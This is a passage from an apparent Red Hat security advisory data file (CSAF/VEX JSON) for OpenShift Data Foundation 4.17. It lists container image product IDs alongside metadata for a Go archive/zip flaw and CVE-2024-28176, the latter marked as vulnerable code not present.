"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Incorrect handling of certain ZIP files"
},
{
"cve": "CVE-2024-28176",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
